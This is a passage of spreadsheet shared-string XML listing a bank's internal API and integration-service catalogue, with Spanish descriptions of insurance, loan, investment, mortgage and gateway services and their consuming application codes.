  </si>
  <si>
    <t>Este servicio realiza la inscripción de una factura en el sistema de recaudos, incluyendo consulta de la inscripción de la factura del cliente, modificación a la inscripción de la factura y eliminación de la inscripción de la factura.</t>
  </si>
  <si>
    <t>SCI _x000D_
CNB _x000D_
ALM _x000D_
SVP _x000D_
GDE _x000D_
SRC _x000D_
APP _x000D_
PSE _x000D_
SVE _x000D_
ATM _x000D_
AUD _x000D_
FAC _x000D_
AW0360</t>
  </si>
  <si>
    <t>Insurance Health</t>
  </si>
  <si>
    <t>Insurance Health - Issue</t>
  </si>
  <si>
    <t>insurance-health-issue</t>
  </si>
  <si>
    <t>Insurance Health - Quote</t>
  </si>
  <si>
    <t>insurance-health-quote</t>
  </si>
  <si>
    <t>Insurance Life</t>
  </si>
  <si>
    <t>Insurance Life - Issue</t>
  </si>
  <si>
    <t>insurance-life-issue</t>
  </si>
  <si>
    <t>Api que genera la expedición de la póliza del seguro solicitado por el cliente. La información que entrega: - ID correspondiente a la expedición de la póliza</t>
  </si>
  <si>
    <t>Insurance Life - Quote</t>
  </si>
  <si>
    <t>insurance-life-quote</t>
  </si>
  <si>
    <t>Api que ayuda a generar una simulación del seguro solicitado por el cliente.  La información que entrega: - Nombre de la cobertura - Fecha en que se efectíºa la cotización - Valor asegurado por cobertura - Valor de la prima sin IVA - Valor del IVA - Total de la prima con IVA incluido</t>
  </si>
  <si>
    <t>Insurance Pets</t>
  </si>
  <si>
    <t>Insurance Pets - Issue</t>
  </si>
  <si>
    <t>insurance-pets-issue</t>
  </si>
  <si>
    <t>Api que genera la expedición de la póliza del seguro solicitado por el cliente La información que entrega:  -	ID correspondiente a la expedición de la póliza</t>
  </si>
  <si>
    <t>Insurance Pets - Quote</t>
  </si>
  <si>
    <t>insurance-pets-quote</t>
  </si>
  <si>
    <t>Api que ayuda a generar una simulación del seguro solicitado por el cliente.  La información que entrega:  - nombre de la cobertura -fecha en que se efectíºa la cotización  - valor asegurado por cobertura - valor de la prima sin IVA - valor del IVA - total de la prima con IVA incluido</t>
  </si>
  <si>
    <t>Insurance Underwriting</t>
  </si>
  <si>
    <t>Insurance Underwriting - Cash Withdrawals</t>
  </si>
  <si>
    <t>insurance-underwriting-cash-withdrawals</t>
  </si>
  <si>
    <t>API que permite asegurar un retiro de dinero en cajeros como el electrónico, adicionalmente, permite conocer la información de los retiros que han sido asegurados.</t>
  </si>
  <si>
    <t>SeguroDeRetiroEnCajero/V1.0</t>
  </si>
  <si>
    <t>AsegurarRetiro_AW1151001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Underwriting</t>
  </si>
  <si>
    <t>Insurance Vehicle</t>
  </si>
  <si>
    <t>insurance-vehicle</t>
  </si>
  <si>
    <t>Esta API tiene capacidades asociadas a la administración de los seguros vehiculares con el corredor de seguro Willis.</t>
  </si>
  <si>
    <t>APM_AW1097001</t>
  </si>
  <si>
    <t>Underwriting Sufi</t>
  </si>
  <si>
    <t>Esta API tiene capacidades asociadas a la administración de los seguros vehiculares de Sufi.</t>
  </si>
  <si>
    <t>WllsWeb_AW1385001</t>
  </si>
  <si>
    <t>WllsWeb_AW1385001 _x000D_
 MonitoreoDCM_AAA</t>
  </si>
  <si>
    <t>Interactive Help</t>
  </si>
  <si>
    <t>Interactive Help - Frequently Asked Questions</t>
  </si>
  <si>
    <t>interactive-help-frequently-asked-questions</t>
  </si>
  <si>
    <t>El servicio de las preguntas frecuentes es un listado de preguntas y respuestas que los clientes hacen de manera recurrente, acerca de diferentes temas o inquietudes del negocio. A través de la API de preguntas frecuentes tenemos las capacidades de Obtener la respuesta de preguntas frecuentes y calificar y comentar una pregunta frecuente.</t>
  </si>
  <si>
    <t>Investment Account</t>
  </si>
  <si>
    <t>Investment Account - Creation</t>
  </si>
  <si>
    <t>investment-account-creation</t>
  </si>
  <si>
    <t>La API permite a los consumidores crear cuentas multiproducto de inversión a un cliente en especí­fico en Valores Bancolombia.</t>
  </si>
  <si>
    <t>AsesoriaAsistida_AW1208 _x000D_
 Inversi_NU0160001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Investment Account - Information</t>
  </si>
  <si>
    <t>investment-account-information</t>
  </si>
  <si>
    <t>La API permitirá a los consumidores consultar las cuentas de inversión asociadas a un cliente especí­fico en Valores Bancolombia.</t>
  </si>
  <si>
    <t>Investment Account - Management</t>
  </si>
  <si>
    <t>investment-account-management</t>
  </si>
  <si>
    <t>Permite realizar la gestión administrativa de las Cuentas de Inversión en Valores Bancolombia.</t>
  </si>
  <si>
    <t>Investment Account - Transfer</t>
  </si>
  <si>
    <t>investment-account-transfer</t>
  </si>
  <si>
    <t>permite realizar transferencias desde y hacia Cuentas Multiproducto de Inversión de Valores Bancolombia.</t>
  </si>
  <si>
    <t>Investment Channel</t>
  </si>
  <si>
    <t>Investment channel  - customer</t>
  </si>
  <si>
    <t>investment-channel-customer</t>
  </si>
  <si>
    <t>Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal.</t>
  </si>
  <si>
    <t>Investment Channel - Management</t>
  </si>
  <si>
    <t>investment-channel-management</t>
  </si>
  <si>
    <t>Esta API permite exponer las capacidades para gestionar los clientes en los diferentes canales del banco</t>
  </si>
  <si>
    <t>Investment Customer</t>
  </si>
  <si>
    <t>Investment Customer Personal Data - Information</t>
  </si>
  <si>
    <t>investment-customer-personal-data-information</t>
  </si>
  <si>
    <t>Permite realizar la consulta de los datos personales de los clientes que tienen inversiones administradas por Valores Bancolombia</t>
  </si>
  <si>
    <t>Investment Notifications</t>
  </si>
  <si>
    <t>Investment Notifications - Notifications</t>
  </si>
  <si>
    <t>investment-notifications-notifications</t>
  </si>
  <si>
    <t>Permite notificar a los clientes que tienen inversiones administradas por Valores Bancolombia a través de correo electrónico y SMS.</t>
  </si>
  <si>
    <t>AsesoriaAsistida_AW1208 _x000D_
 Inversi_NU0160001</t>
  </si>
  <si>
    <t>Investments Channel</t>
  </si>
  <si>
    <t>Investments channel  - customer</t>
  </si>
  <si>
    <t>investments-channel-customer</t>
  </si>
  <si>
    <t>Modulo Administrativo Canales Digitales_AW1204</t>
  </si>
  <si>
    <t>Linea Unica</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio LineaUnica, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia.</t>
  </si>
  <si>
    <t>Adminfo_Adminfo_AW0157001</t>
  </si>
  <si>
    <t>Allus</t>
  </si>
  <si>
    <t>Listado Cuentas Depositos</t>
  </si>
  <si>
    <t>Las cuentas de ahorro y corrientes son productos financieros de alta demanda por parte de los clientes y en ese sentido es necesario que el banco tenga la capacidad de acceder a la información de estas cuentas. El objetivo de este servicio es agrupar todas las capacidades de consulta de información NO monetaria de los productos de cuentas depósitos.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1203001 _x000D_
AW1128</t>
  </si>
  <si>
    <t>Loan</t>
  </si>
  <si>
    <t>Loan - Balances</t>
  </si>
  <si>
    <t>loan-balances</t>
  </si>
  <si>
    <t>La API Loan Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos LAA: Préstamo retail, CLA: Préstamo corporativo que se encuentren activos en las Filiales del exterior</t>
  </si>
  <si>
    <t>ConsultaSaldosCreditos/V1.0</t>
  </si>
  <si>
    <t>Loan - Disbursements</t>
  </si>
  <si>
    <t>loan-disbursements</t>
  </si>
  <si>
    <t>Esta API cuenta con capacidades que permiten la creación obligaciones crediticias y diversas formas de disponibilización de sus recursos.</t>
  </si>
  <si>
    <t>PROFIN_PRODUCTORCONSUMIDOR _x000D_
 AW1313001_VTD_Rediferidos_Back _x000D_
 BNPL_NU0287001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Loan - Loans</t>
  </si>
  <si>
    <t>loan-loans</t>
  </si>
  <si>
    <t>Esta API cuenta con capacidades que permiten la consulta de préstamos de un cliente así­ como de detalles de una obligación.</t>
  </si>
  <si>
    <t>Loans Sufi Study Consume</t>
  </si>
  <si>
    <t>Loan Additional Information</t>
  </si>
  <si>
    <t>loan-additional-information</t>
  </si>
  <si>
    <t>La API Loans Sufi study consume - Loan additional information tiene como objetivo ofrecer las capacidades de diligenciamiento y consulta de los datos complementarios necesarios para iniciar la fase de instrumentación en una solicitud de crédito de consumo de Sufi y así­ permitir el desembolso al aliado.</t>
  </si>
  <si>
    <t>VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000D_
 VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000D_
 MONSUFI_AW1191035 _x000D_
 MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>Loan Application</t>
  </si>
  <si>
    <t>loan-application</t>
  </si>
  <si>
    <t>Esta API tiene capacidades relacionadas con la gestión de una solicitud de crédito de consumo, permitiendo iniciar el proceso de estudio de crédito, consultar el estado de todas la solicitudes y detalles de una solicitud que fue aprobada. Además, contiene una capacidad de consulta que le í­ndica al usuario si es posible efectué la radicación de la solicitud que se encuentra diligenciando.</t>
  </si>
  <si>
    <t>NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API tiene capacidades relacionadas con la gestión de una solicitud de crédito de consumo, permitiendo iniciar el proceso de estudio de crédito, consultar el estado de todas la solicitudes y detalles de una solicitud que fue aprobada. Además, contiene una capacidad de consulta que le í­ndica al usuario si es posible efectué la radicación de la solicitud que se encuentra diligenciando. </t>
  </si>
  <si>
    <t>Loan Application Information</t>
  </si>
  <si>
    <t>loan-application-information</t>
  </si>
  <si>
    <t>Esta API tiene capacidades que permiten la consulta y la creación de la información necesaria para la solicitud de un crédito de consumo en Sufi, con el propósito de su radicación posterior para que se efectué un estudio de crédito. Nota: Para la diligenciar este bloque de información se debe consumir los catalogos de referencia de sufi que entregan el dominio de valores de los campos que lo requieren. En la documentación de la operación (DO_addProductData_v1.0.0_.xlsx), en cada campo se especifica como se debe consultar dicho catálogo, de manera que se tenga para cada campo los datos de referencia que entiende el back de la API.</t>
  </si>
  <si>
    <t>Loan application information</t>
  </si>
  <si>
    <t>Loan Documents Sufi</t>
  </si>
  <si>
    <t>loan-documents-sufi</t>
  </si>
  <si>
    <t>La API Document Service Sufi- loan documents provee capacidades relacionadas con la entrega y recuperación de documentos utilizados en el proceso de solicitud de credito y tambien posterior a esto</t>
  </si>
  <si>
    <t>Loan Utilities</t>
  </si>
  <si>
    <t>Loan Utilities - Installments</t>
  </si>
  <si>
    <t>loan-utilities-installments</t>
  </si>
  <si>
    <t>Esta API cuenta con capacidades que permiten el cálculo de cuota para créditos no desembolsados y de recálculo para créditos desembolsados.</t>
  </si>
  <si>
    <t>CalculoCuotaCredito/V1.0</t>
  </si>
  <si>
    <t>MsUtilities_NU0102001 _x000D_
 APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Loans</t>
  </si>
  <si>
    <t>Loans - Agreements Enquiry</t>
  </si>
  <si>
    <t>loans-agreements-enquiry</t>
  </si>
  <si>
    <t>Esta API expone métodos que permiten la consulta datos básicos de convenios empresariales de cartera los cuales pueden ser de libranza, seguros, DAI, ONGs o fundaciones, etc</t>
  </si>
  <si>
    <t>AdministracionConveniosCartera/V1.0</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 ALM_AW0955 _x000D_
 Auditoria _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 LimitsCreditExhibition_NU0114001 _x000D_
 APP_NU0114001 _x000D_
 LoansOffer_NU0102001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 BNPL_NU0287001</t>
  </si>
  <si>
    <t>Loans - Enquiry</t>
  </si>
  <si>
    <t>loans-enquiry</t>
  </si>
  <si>
    <t>Api que permite la consulta de los préstamos que tenga un cliente o un convenio empresarial, la consulta detallada y los movimientos de un préstamo en particular.</t>
  </si>
  <si>
    <t>ConsultaInformacionPrestamos/V2.0</t>
  </si>
  <si>
    <t>Loans - Loan Applications</t>
  </si>
  <si>
    <t>loans-loan-applications</t>
  </si>
  <si>
    <t>SolicitudDeCredito/V1.0</t>
  </si>
  <si>
    <t>Loans - Maximum Loan Amount</t>
  </si>
  <si>
    <t>loans-maximum-loan-amount</t>
  </si>
  <si>
    <t>ConsultaDatosCartera/V2.0</t>
  </si>
  <si>
    <t>Loans - Payment</t>
  </si>
  <si>
    <t>loans-payment</t>
  </si>
  <si>
    <t>Esta API encargada de realizar los pagos de créditos comerciales, enviando al TEF3 de la transacción 001, la cuenta, el tipo de cuenta y el valor del prestamo de cliente para aplicar su pago, retornando el numero de pagaré.</t>
  </si>
  <si>
    <t>PagoPrestamos/V2.0</t>
  </si>
  <si>
    <t>Loans Information</t>
  </si>
  <si>
    <t>loans-information</t>
  </si>
  <si>
    <t>API para la consulta de obligaciones Sufi</t>
  </si>
  <si>
    <t>Loans Sufi</t>
  </si>
  <si>
    <t>Loans Sufi - Simulation</t>
  </si>
  <si>
    <t>simulation</t>
  </si>
  <si>
    <t>El API 'Simulación del Crédito'? se encarga de recibir los datos básicos, valores y plazo de un posible crédito, para proceder a generar una simulación y responder con los resultados de cuotas y demás datos de pagos que el cliente asumirá, para que con dicha información pueda tomar la decisión de iniciar la radicación del estudio de crédito. Esta API será genérica para cualquier producto o lí­nea de negocio en SUFI.</t>
  </si>
  <si>
    <t>MovilidadCore_AW1281002 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Loans-Collaterals</t>
  </si>
  <si>
    <t>loans-collaterals</t>
  </si>
  <si>
    <t>Esta API permite consultar la información general de las garantí­as  asociadas a un cliente</t>
  </si>
  <si>
    <t>Management</t>
  </si>
  <si>
    <t>management</t>
  </si>
  <si>
    <t>API para la gestión de obligaciones Sufi</t>
  </si>
  <si>
    <t>Mantenimiento Obligaciones Cartera</t>
  </si>
  <si>
    <t>En su versión inicial, este servicio expone una capacidad que permite actualizar los detalles de un préstamo en el aplicativo core Bankvision.</t>
  </si>
  <si>
    <t>AW1313 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Manual Study</t>
  </si>
  <si>
    <t>manual-study</t>
  </si>
  <si>
    <t>API publica que permite realizar de la información adicional en que caso de requerirse un estudio manueal para el crédito de vehiculo. Esta API se toma como una tercera familia de apis, con tres capacidades que se irán ejecutando secuencialmente. Una vez realizado este registro de datos para el estudio manual, se entrega una respuesta indicando que se realizará el estudio. Esta APIs esta especificada en el contexto funcional de SUFI-Vehiculos.</t>
  </si>
  <si>
    <t>&lt;p&gt;La capacidad expuesta por Grupo Bancolombia tiene como objetivo la radicaci&amp;oacute;n de la informaci&amp;oacute;n necesaria para realizar el estudio de cr&amp;eacute;dito para v&amp;eacute;hiculo con los siguientes pasos del proceso:&lt;/p&gt; &lt;p&gt;Los pasos a seguir en este proceso son:&lt;br /&gt;   &lt;ol&gt;&lt;li&gt;La soluci&amp;oacute;n se debe autenticar en la plataforma de APIs de Bancolombia.&lt;/li&gt;&lt;li&gt;La soluci&amp;oacute;n debe presentar los formularios para la captura de la informaci&amp;oacute;n para la radicaci&amp;oacute;n de la solicitud del cr&amp;eacute;dito, con los datos del comercio si aplica, categorizaci&amp;oacute;n del producto, datos del producto.&lt;/li&gt;&lt;li&gt;Continua con el registro de informaci&amp;oacute;n Personal (realizando la precarga de datos si es cliente Bancolombia por medio de la API de Customers) y financiera, actividad econ&amp;oacute;mica.&lt;/li&gt;&lt;li&gt;Se realiza el env&amp;iacute;o de informaci&amp;oacute;n aceptando terminos y condiciones.&lt;/li&gt;&lt;li&gt;Se realizan la validaciones de Pre-Bureau, Bureau y Pos-Bureau.&lt;/li&gt;&lt;li&gt;Generaci&amp;oacute;n autom&amp;aacute;tica de una aprobaci&amp;oacute;n, rechazo o en su defecto env&amp;iacute;o a estudio manual.&lt;/li&gt; &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Market Place</t>
  </si>
  <si>
    <t>Market Place - Items</t>
  </si>
  <si>
    <t>market-place-items</t>
  </si>
  <si>
    <t>Esta API permite consultar la información de los productos que son ofrecidos atraves del market place de Bancolombia. Permitiendo consultar listas de productos, un producto en especí­fico, los productos mas visitas o los productos favoritos por clientes.</t>
  </si>
  <si>
    <t>HabitatCore_AW1281003 _x000D_
 MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>Market Place - Orders</t>
  </si>
  <si>
    <t>market-place-orders</t>
  </si>
  <si>
    <t>Esta API permite consultar la información de las órdenes generadas por los clientes a través del market place de Bancolombia.</t>
  </si>
  <si>
    <t>Market Place - Schedule</t>
  </si>
  <si>
    <t>market-place-schedule</t>
  </si>
  <si>
    <t>Esta API permite gestionar la agenda de un cliente en el market place, donde podrá consultar sus agendas, reagendar una cita o cancelar una cita.</t>
  </si>
  <si>
    <t>Loans Sufi Catalogs</t>
  </si>
  <si>
    <t>Master Reference</t>
  </si>
  <si>
    <t>loans-catalogs-master-reference</t>
  </si>
  <si>
    <t>Esta API tiene capacidades que permiten la consulta de los catálogos maestros de referencia dentro del contexto de las solicitudes de crédito de Sufi, que se exponen para diferentes funcionalidades que serán expuestas a los clientes y así­ para facilitar el registro de información y consumo de otras capacidades que requieren estos datos referencia.</t>
  </si>
  <si>
    <t>NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000D_
 VDSAUTOGESTIONCONSUMOBACK_NU0037003</t>
  </si>
  <si>
    <t>Merchandising Loan</t>
  </si>
  <si>
    <t>Merchandising Loan - Financial Renting</t>
  </si>
  <si>
    <t>merchandising-loan-financial-renting</t>
  </si>
  <si>
    <t>Esta API permite identificar informacion sobre un cliente con base en el arrendamiento por el uso de un producto y/o servicio</t>
  </si>
  <si>
    <t>Modificacion De Cupo Tarjetas</t>
  </si>
  <si>
    <t>El servicio Modificación de Cupo permite aumentar o disminuir el cupo (límite) de una tarjeta de crédito mediante el número de tarjeta, el cupo actual y el cupo nuevo.</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1176 _x000D_
AW1285001</t>
  </si>
  <si>
    <t>Modificar Participante</t>
  </si>
  <si>
    <t>Permite modificar información de participantes en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)</t>
  </si>
  <si>
    <t>AW0611002 _x000D_
AW0611001 _x000D_
AW0795</t>
  </si>
  <si>
    <t>Monitoreo Riesgo Transaccional</t>
  </si>
  <si>
    <t>Este servicio evalúa el riesgo de una transacción en modo síncrono, aplicando sobre la misma los filtros definidos en el ámbito de monitoreo transaccional, es decir, reglas que validen condiciones de las transacciones, adicional, el score de riesgo que SAS FM (herramienta que responde el score a Thanos)  genera de acuerdo al perfil transaccional del cliente. 
Todo el proceso de enviar la petición desde el consumidor, que pase por integración, complementar la información necesaria, entregar a la herramienta de monitoreo SAS Fraud Management, y responder al consumidor con una recomendación sobre la decisión de la transacción se debe realizar en menos de 500 milisegundos. Es el consumidor el que debe aplicar la acción bajo la recomendación del motor (ejemplo: declinar una transacción).</t>
  </si>
  <si>
    <t>SVP _x000D_
APP _x000D_
SVE</t>
  </si>
  <si>
    <t>Mortgage</t>
  </si>
  <si>
    <t>Mortgage Loan - Balances</t>
  </si>
  <si>
    <t>mortgage-loan-balances</t>
  </si>
  <si>
    <t>La API permitirá a los consumidores consultar el saldo de los proyectos que están asociados a un constructor en particular, el servicio retornara campos como nombre del proyecto, titular, saldos intereses trimestrales etc.</t>
  </si>
  <si>
    <t>ConsultarCreditoHipotecario/V2.0
ConsultarCreditoHipotecario/V3.0</t>
  </si>
  <si>
    <t>PortalConstructorAW0360004_SVE _x000D_
 PortalConstructorAW0360004_SVE _x000D_
 EASYHOME_NU0004001 _x000D_
 MONITOREO_AW1010001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Mortgage Loan Behavioral</t>
  </si>
  <si>
    <t>Mortgage Loan Behavioral - Mortgage Loan Study</t>
  </si>
  <si>
    <t>mortgage-loan-behavioral-mortgage-loan-study</t>
  </si>
  <si>
    <t>El API Mortgage Loan Behavioral - Mortgage Loan Study: permite disponer el resultado del estudio de crédito de Hipotecario de formas más ágil, entregando de manera inmediata la respuesta de un cupo para clientes actuales y nuevos, de acuerdo con las polí­ticas de riesgos.</t>
  </si>
  <si>
    <t>RespuestaFrenteHipo_AW0856 _x000D_
 HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>Mortgage Loan Payments</t>
  </si>
  <si>
    <t>Mortgage Loan Payments- Constructor</t>
  </si>
  <si>
    <t>mortgage-loan-payments-constructor</t>
  </si>
  <si>
    <t>Esta API expone el metodo de PagoCreditoHipotecarioConstructor que permite tanto el pago como el reverso de créditos hipotecarios de corto plazo</t>
  </si>
  <si>
    <t>MPG_ALM</t>
  </si>
  <si>
    <t>Multi Protocol Gateway</t>
  </si>
  <si>
    <t>Productos</t>
  </si>
  <si>
    <t>Servicio MDP</t>
  </si>
  <si>
    <t>MPG_APM_TLS_ADAPTER</t>
  </si>
  <si>
    <t>OMAPM_SUFI_AW1097001</t>
  </si>
  <si>
    <t>MPG_CA_AllFunds_AF</t>
  </si>
  <si>
    <t>MPG_CA_CADENA_CA</t>
  </si>
  <si>
    <t>MPG_CA_restjson</t>
  </si>
  <si>
    <t>MPG_CIB_RemesasMoneyGram_RMG</t>
  </si>
  <si>
    <t>MPG_EnvioCorreoElectronicoTODO1_ECT</t>
  </si>
  <si>
    <t>Canales</t>
  </si>
  <si>
    <t>MPG_GAF_Marcaciones</t>
  </si>
  <si>
    <t>MPG_IA_CONSULTARCLIENTEPREFERENCIALFNAL_CCPFN</t>
  </si>
  <si>
    <t>MPG_IA_GestionAutenticacionOAuth_v2_GAO</t>
  </si>
  <si>
    <t>CLR (CLARO)
TLP (Teleperformance)
KNT (KONECTA)
BOT (TABOOT BANCOLOMBIA)</t>
  </si>
  <si>
    <t>MPG_IA_GESTIONGARANTIASFONDONACIONAL_GGFN</t>
  </si>
  <si>
    <t>BankVision - BKE_Garantias_ISBKS0003</t>
  </si>
  <si>
    <t>MPG_IA_GIROS_JSON_MULTICANAL</t>
  </si>
  <si>
    <t>MPG_IA_GOOGLE_RECAPTCHA_VERIFY</t>
  </si>
  <si>
    <t>ServiciosExternos</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_ADMINFO</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_ADMINFO_JSON</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_DOMINA</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_METRO</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_PIS</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_PS</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_THOMASEXPRESS</t>
  </si>
  <si>
    <t>MPG_IA_HTTPS_TODO1</t>
  </si>
  <si>
    <t>MPG_IA_INALAMBRIA</t>
  </si>
  <si>
    <t>MPG_IA_InformeDiarioDIAN</t>
  </si>
  <si>
    <t>MPG_IC_AutenticacionClienteDIAN</t>
  </si>
  <si>
    <t>MPG_IC_AutenticacionMinHacienda_AMH</t>
  </si>
  <si>
    <t>MPG_IC_AutenticacionOauth</t>
  </si>
  <si>
    <t>MPG_IC_AutenticarCompraVCAS</t>
  </si>
  <si>
    <t>MPG_IC_CONSUINFOFISCYPARAFISCALCLI_CIFYPFDC</t>
  </si>
  <si>
    <t>MPG_IC_ConsultaFuentesPrivadasExternas_CFPE</t>
  </si>
  <si>
    <t>MPG_IC_ConsultaProductosInvestBot_CPI</t>
  </si>
  <si>
    <t>MPG_IC_ConsultarToken_CTRA</t>
  </si>
  <si>
    <t>MPG_IC_ContribucionDocumental_CD</t>
  </si>
  <si>
    <t>MPG_IC_DigitalizacionTarjetasMDES</t>
  </si>
  <si>
    <t>MPG_IC_DigitalSignature_API</t>
  </si>
  <si>
    <t>ApoyoCorporativo</t>
  </si>
  <si>
    <t>MPG_IC_DocumentDigitalization_API</t>
  </si>
  <si>
    <t>MPG_IC_EnvioCorreoElectronico_ECE</t>
  </si>
  <si>
    <t>MPG_IC_ENVIOMENSAJERIAMOVIL</t>
  </si>
  <si>
    <t>MPG_IC_EnvioSMSRedeban_ESR</t>
  </si>
  <si>
    <t>MPG_IC_GestionFraudeCrediticio_GFC</t>
  </si>
  <si>
    <t>MPG_IC_GESTIONLLAVECIFRADO_GLC</t>
  </si>
  <si>
    <t>APIC
CLR (CLARO)
TLP (Teleperformance)
KNT (KONECTA)
BOT (TABOOT BANCOLOMBIA)</t>
  </si>
  <si>
    <t>MPG_IC_GestionPuntosColombia_GPC</t>
  </si>
  <si>
    <t>MPG_IC_GestionRealceTarjetas_GRT</t>
  </si>
  <si>
    <t>MPG_IC_GestionRecaudoDIAN</t>
  </si>
  <si>
    <t>MPG_IC_GestionSimCard</t>
  </si>
  <si>
    <t>MPG_IC_GestionSolicitudPagos_GSP</t>
  </si>
  <si>
    <t>MPG_IC_GestionTransaccionesQRBilletera_GTQB</t>
  </si>
  <si>
    <t>Redeban</t>
  </si>
  <si>
    <t>ISNBM001</t>
  </si>
  <si>
    <t>MPG_IC_INALAMBRIA</t>
  </si>
  <si>
    <t>MPG_IC_InformeMinHacienda_IMH</t>
  </si>
  <si>
    <t>MPG_IC_QFLOW_JSON_SERV</t>
  </si>
  <si>
    <t>Sucursales</t>
  </si>
  <si>
    <t>MPG_IC_QFLOW_JSON_USER</t>
  </si>
  <si>
    <t>MPG_IC_RoboAdvisor_RA</t>
  </si>
  <si>
    <t>MPG_IC_SendEmailWithAttach_API</t>
  </si>
  <si>
    <t>MPG_IC_SimpleCustomerAuthentication_SCA</t>
  </si>
  <si>
    <t>MPG_IC_TRANSACCION_TOKEN_INVESTBOT_TTI</t>
  </si>
  <si>
    <t>MPG_IC_TRANSFERENCIAS_INVESTBOT_TI</t>
  </si>
  <si>
    <t>AW1208001</t>
  </si>
  <si>
    <t>MPG_IC_ValidacionPrimeraSegundaClave_VPSC</t>
  </si>
  <si>
    <t>MPG_IC_ValidarSesion_VS</t>
  </si>
  <si>
    <t>MPG_IC_VerificacionCodigoAutorizacion_VCA</t>
  </si>
  <si>
    <t>MPG_LOGGING_ADAPTER_LA</t>
  </si>
  <si>
    <t>MPG_OAUTH_GPC</t>
  </si>
  <si>
    <t>MPG_PSE_VALORES</t>
  </si>
  <si>
    <t>MPG_REALIZAR_OPERACION_FIDUCIARIA</t>
  </si>
  <si>
    <t>MPG_SAP_ERP_TO_EC_COSTCENTER_REP</t>
  </si>
  <si>
    <t>MPG_SM_AutenticacionCliente_AC</t>
  </si>
  <si>
    <t>MPG_SM_AUTENTICAR_USUARIO_AU</t>
  </si>
  <si>
    <t>MPG_SM_CIPDC_V2</t>
  </si>
  <si>
    <t>MPG_SM_ConfirmarIdentidadPersonaEnDataCredito_CIPDC</t>
  </si>
  <si>
    <t>MPG_SM_ConsultaMarcacionesPersonas</t>
  </si>
  <si>
    <t>MPG_SM_ConsultarFuentesPublicasExternas_CFPE</t>
  </si>
  <si>
    <t>MPG_SM_ConsultaTCRM_CTCRM</t>
  </si>
  <si>
    <t>MPG_SM_EnvioDataLiquidaPersona_EDLP</t>
  </si>
  <si>
    <t>MPG_SM_GESTION_SESION_GS</t>
  </si>
  <si>
    <t>MPG_SM_GESTIONAR_SESION_GS</t>
  </si>
  <si>
    <t>MPG_SM_GestionarPagareElectronico_GPE</t>
  </si>
  <si>
    <t>MPG_SM_GestionPrecalculadoCliente_GPC</t>
  </si>
  <si>
    <t>MPG_SM_Notificacion_Nequi</t>
  </si>
  <si>
    <t>MPG_SM_NotificacionCreditoConsumo_NCC</t>
  </si>
  <si>
    <t>MPG_SM_NotificacionNovedadTP_NNMA</t>
  </si>
  <si>
    <t>MPG_SM_RecuperarCuentasDeposito_RCD</t>
  </si>
  <si>
    <t>MPG_SM_VinculacionCuentas_Nequi</t>
  </si>
  <si>
    <t>MPG_SOMA_MANAGEMENT</t>
  </si>
  <si>
    <t>MPG_WSCADP</t>
  </si>
  <si>
    <t>MPG_WSCADP_V1</t>
  </si>
  <si>
    <t>Notifica Envio Archivo</t>
  </si>
  <si>
    <t>Este servicio permite a los diferentes sistemas de Bancolombia, enviar un mensaje de notificación al aplicativo Finacle Recaudos de que se le ha dejado en un FileSystem un archivo para que lo pueda procesar.</t>
  </si>
  <si>
    <t>AW01065 _x000D_
PAB _x000D_
TVP _x000D_
AW1065 _x000D_
PSE</t>
  </si>
  <si>
    <t>Notifica Envio Archivo Iseries</t>
  </si>
  <si>
    <t>Este servicio permite a los diferentes sistemas de Bancolombia, externos al iSeries, enviar un mensaje de notificación a aplicativos existentes en el iSeries Medellin de que se les ha dejado en una ruta IFS un archivo para que lo puedan procesar.</t>
  </si>
  <si>
    <t>AW01065 _x000D_
TVP</t>
  </si>
  <si>
    <t>Notificacion Archivo Pagos</t>
  </si>
  <si>
